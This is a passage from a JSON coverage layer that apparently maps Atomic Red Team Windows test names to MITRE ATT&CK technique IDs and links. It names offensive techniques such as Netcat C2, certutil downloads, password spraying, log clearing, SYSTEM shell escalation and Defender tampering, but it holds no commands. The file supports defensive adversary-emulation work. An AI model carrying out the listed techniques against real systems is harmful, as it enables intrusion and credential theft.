it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}],"comment":"\n- Telnet C2\n"},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":69,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Use Powershell to Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":3,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n- Peripheral Device Discovery via fsutil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":5,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n- Juicy Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local 